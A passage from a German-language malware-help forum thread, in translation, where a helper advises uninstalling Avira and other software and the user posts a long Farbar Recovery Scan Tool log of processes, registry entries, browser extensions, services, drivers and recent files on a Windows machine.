Log analysis and evaluation: UPC reports: virus, worms are being sent via my IP
Windows 7
If you have caught a Trojan or keep getting virus warnings, you can post the logs from our diagnostic tools here for evaluation by our experts. Before viruses and Trojans can be removed, the infected system first has to be examined: First steps for getting help. Note that an infected system is not trustworthy and should not be used until the malware has been completely removed.
04.08.2017, 18:23 | #16 |
| UPC reports: virus, worms are being sent via my IP *up* |
04.08.2017, 22:17 | #17 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC reports: virus, worms are being sent via my IP
A fair amount of junk has to come off, though. Partly old versions, another part is a great deal of useless junk, including Avira. Get rid of all of it. Alternatives will be named once we are done here.
Let me know when Avira is gone; once we are done here, you can switch to a different virus scanner, details will then follow in the closing post. Please do NOT install anything else from NOW on without checking with me first! Please download Revo Uninstaller (alternatively the portable Revo Uninstaller) from here.
__________________ |
06.08.2017, 00:27 | #18 |
| UPC reports: virus, worms are being sent via my IP
All right. I have uninstalled the programs mentioned.
While using the uninstaller I noticed that I still had many other unnecessary or no longer used programs installed. So I uninstalled those right away as well. Here are the new logs in case they are needed. They should also be easier to read now after the cleanup. Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 31-07-2017 durchgeführt von **** (Administrator) auf SILENTDRAGON (06-08-2017 01:14:07) Gestartet von C:\Users\****\Desktop Geladene Profile: **** (Verfügbare Profile: ****) Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser: Chrome) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Electronic Arts) G:\Program Files (x86)\Origin\OriginWebHelperService.exe (Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe (Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe (Logitech, Inc.) C:\Program Files\Common Files\logishrd\KHAL3\KHALMNPR.exe (Logitech Inc.) 
C:\Program Files\Logitech Gaming Software\LCore.exe (TomTom) C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe (Valve Corporation) G:\Program Files (x86)\Steam\Steam.exe (Dropbox, Inc.) C:\Users\****\AppData\Local\Dropbox\Update\DropboxUpdate.exe (Wargaming.net) G:\Games\World_of_Warships\WargamingGameUpdater.exe (Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe (Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe (Google, Inc) C:\Users\****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe (Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe () C:\Program Files\Qualcomm Atheros\Network Manager\NetworkManager.exe (Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe (Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (Valve Corporation) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe (Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (NVIDIA Corporation) C:\Users\****\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\NvOAWrapperCache.exe (Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage 
Technology\IAStorDataMgrSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe (Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe (Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Skype Technologies) C:\Program Files (x86)\Skype\Updater\Updater.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\SMService.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\ClassicStart.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\StartMenu_Hook.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\InstallServices.exe (DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe ==================== Registry (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-05-15] (Realtek Semiconductor) HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation) HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-26] (Logitech, Inc.) HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [17406072 2017-01-24] (Logitech Inc.) HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.) 
HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [318128 2016-11-16] (Samsung Electronics Co., Ltd.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-21] (Oracle Corporation) HKLM-x32\...\Winlogon: [Userinit] Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [MyDriveConnect.exe] => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [1918696 2017-05-08] (TomTom) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Steam] => G:\Program Files (x86)\Steam\steam.exe [3062560 2017-07-18] (Valve Corporation) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Update] => C:\Users\****\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-27] (Google Inc.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [BingSvc] => C:\Users\****\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Dropbox Update] => C:\Users\****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [World of Warships] => G:\Games\World_of_Warships\WargamingGameUpdater.exe [3136264 2017-06-02] (Wargaming.net) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Akamai NetSession Interface] => C:\Users\****\AppData\Local\Akamai\netsession_win.exe [4490200 2017-01-03] (Akamai Technologies, Inc.) 
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Photos Backup] => C:\Users\****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-09] (Google, Inc) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Spotify Web Helper] => C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Killer Network Manager.lnk [2015-02-03] ShortcutTarget: Killer Network Manager.lnk -> C:\Windows\Installer\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}\NetworkManager.exe_130C27D738F34C89BDDF21BCFD74B56D.exe (Flexera Software LLC) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\simplicheck.lnk [2017-05-06] ShortcutTarget: simplicheck.lnk -> C:\Program Files (x86)\simplitec\simplicheck\simplicheck.exe (Keine Datei) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UE Music Library-Taskleisten-Tool.lnk [2016-05-04] ShortcutTarget: UE Music Library-Taskleisten-Tool.lnk -> C:\Program Files (x86)\Logitech\UE Music Library\UEMLTray.exe (Keine Datei) Startup: C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2017-08-05] ShortcutTarget: Dropbox.lnk -> C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) 
Tcpip\Parameters: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60 Tcpip\..\Interfaces\{f81baef3-2886-44c5-9a55-1cfe2ed39eeb}: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60 ManualProxies: Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q= HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/ HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/ SearchScopes: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO: Kein Name -> {AF949550-9094-4807-95EC-D1C317803333} -> Keine Datei BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-06] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-06] (Oracle Corporation) FireFox: ======== FF ProfilePath: C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default [2017-08-06] FF Extension: (Avira Browser Safety) - 
C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01] FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-08-08] [ist nicht signiert] FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-06] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-06] (Oracle Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.) 
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=3 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=9 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin64 -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.) 
Chrome: ======= CHR HomePage: Default -> msn.com CHR StartupUrls: Default -> "hxxps://www.google.ch/" CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms} CHR DefaultSearchKeyword: Default -> bing.com CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms} CHR Profile: C:\Users\****\AppData\Local\Google\Chrome\User Data\Default [2017-08-06] CHR Extension: (Google*Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-01] CHR Extension: (Google Präsentationen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-08-01] CHR Extension: (Google Docs) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-01] CHR Extension: (Google Drive) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-01] CHR Extension: (YouTube) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-01] CHR Extension: (Bing) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-08-01] CHR Extension: (Google Tabellen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-08-01] CHR Extension: (Google Docs Offline) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-01] CHR Extension: (Testen Sie Ihre Internet-Geschwindigkeit) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\hekhmbhledgahgpondpnaeaffoipehch [2017-08-01] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-01] 
CHR Extension: (Deutsch Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohiojbnhbaoegegaajagfiekffejejih [2017-08-01] CHR Extension: (YouTube™ Flash-HTML5) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\omimccinlhlkpjaeaocglgmkbelejlhj [2017-08-01] CHR Extension: (Google Mail) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-01] CHR Extension: (Chrome Media Router) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-01] CHR Extension: (Skype-Anrufe) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\poghlonenmjdkfghdpfomojhhfggildk [2017-08-01] CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx ==================== Dienste (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [305664 2014-08-11] (Qualcomm Atheros) [Datei ist nicht signiert] S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1465352 2017-01-15] () S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [487488 2017-07-31] (GOG.com) S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [8163392 2017-07-15] (GOG.com) S3 HiPatchService; G:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [Datei ist nicht signiert] R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation) S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation) R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-09-03] (Intel Corporation) S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-26] (Intel Corporation) S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation) R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [225400 2017-04-06] (Logitech Inc.) 
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation) R3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation) R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation) R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-26] (NVIDIA Corporation) S3 Origin Client Service; G:\Program Files (x86)\Origin\OriginClientService.exe [2169696 2017-07-11] (Electronic Arts) R2 Origin Web Helper Service; G:\Program Files (x86)\Origin\OriginWebHelperService.exe [3149672 2017-07-11] (Electronic Arts) S4 PDF Architect 5 Manager; C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe [985904 2017-02-01] (© pdfforge GmbH.) R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [217736 2017-02-23] (Geek Software GmbH) R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [387584 2014-09-19] (Qualcomm Atheros) [Datei ist nicht signiert] R2 SMService; C:\Program Files (x86)\IObit\Classic Start\SMService.exe [1066272 2016-11-15] (IObit) R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.) R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation) S2 DigitalWave.Update.Service; "C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe" [X] ===================== Treiber (Nicht auf der Ausnahmeliste) ====================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. 
Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R3 AVerPL33_x64; C:\WINDOWS\system32\DRIVERS\AVerPL33_x64.sys [1780992 2014-07-16] (AVerMedia TECHNOLOGIES, Inc.) S3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [41176 2015-08-22] (Broadcom Corporation.) S1 BfLwf; C:\WINDOWS\system32\DRIVERS\bwcW8x64.sys [97968 2014-09-11] (Qualcomm Atheros, Inc.) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.) R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-16] (ELAN Microelectronic Corp.) R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-03-15] (REALiX(tm)) S3 Ke2200; C:\WINDOWS\System32\drivers\e22w8x64.sys [130224 2014-03-27] (Qualcomm Atheros, Inc.) R3 KillerEth; C:\WINDOWS\System32\drivers\e2xw10x64.sys [145920 2017-03-18] (Qualcomm Atheros, Inc.) R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech) R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-01-24] (Logitech Inc.) R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys [15668664 2017-07-19] (NVIDIA Corporation) R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-26] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-26] (NVIDIA Corporation) R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation) R3 SaiMini; C:\WINDOWS\System32\drivers\SaiMini.sys [23968 2016-08-06] (Saitek) R3 SaiNtBus; C:\WINDOWS\system32\drivers\SaiBus.sys [51488 2016-08-06] (Saitek) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.) 
S3 USBADVAU; C:\WINDOWS\system32\drivers\cm11264.sys [4135936 2013-11-01] (C-Media Electronics Inc) [Datei ist nicht signiert] S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation) R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-08-06 01:08 - 2017-08-06 01:08 - 001160480 _____ (Uniblue Systems Limited ) C:\Users\****\Downloads\pcmechanicpm.exe 2017-08-06 00:28 - 2017-08-06 00:28 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll 2017-08-05 23:13 - 2017-08-05 23:13 - 000003064 _____ C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (****) 2017-08-05 22:57 - 2017-08-05 22:57 - 000000927 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk 2017-08-05 22:57 - 2017-08-05 22:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2017-08-05 00:32 - 2017-08-05 00:32 - 000000000 ____D C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox 2017-08-04 22:53 - 2017-08-05 02:38 - 000000000 ____D C:\Users\****\.junique 2017-08-04 22:53 - 2017-08-04 22:55 - 000000000 ____D C:\Users\****\.minion 2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\****\AppData\Roaming\gg.minion.Minion 2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\****\.oracle_jre_usage 2017-08-04 22:52 - 2017-08-04 22:52 - 052825304 _____ (Good Game Mods LLC ) C:\Users\****\Desktop\Minion3.0.5.exe 2017-08-04 22:52 - 
2017-08-04 22:52 - 000000664 _____ C:\Users\****\Documents\Minion.lnk 2017-08-04 22:52 - 2017-08-04 22:52 - 000000000 ____D C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Good Game Mods LLC 2017-08-01 15:04 - 2017-08-01 15:36 - 000122733 _____ C:\Users\****\Desktop\Addition.txt 2017-08-01 15:01 - 2017-08-06 01:14 - 000024036 _____ C:\Users\****\Desktop\FRST.txt 2017-08-01 12:17 - 2017-08-03 22:03 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable) 2017-08-01 12:17 - 2017-08-01 12:40 - 000192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2017-08-01 12:17 - 2017-08-01 12:32 - 000000000 ____D C:\Users\****\AppData\Local\Nybgy 2017-08-01 12:17 - 2017-08-01 12:17 - 000000000 ____D C:\ProgramData\Malwarebytes 2017-08-01 12:15 - 2017-08-01 12:40 - 000109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2017-08-01 12:14 - 2017-08-01 12:53 - 000000000 ____D C:\Users\****\Desktop\mbar 2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) 
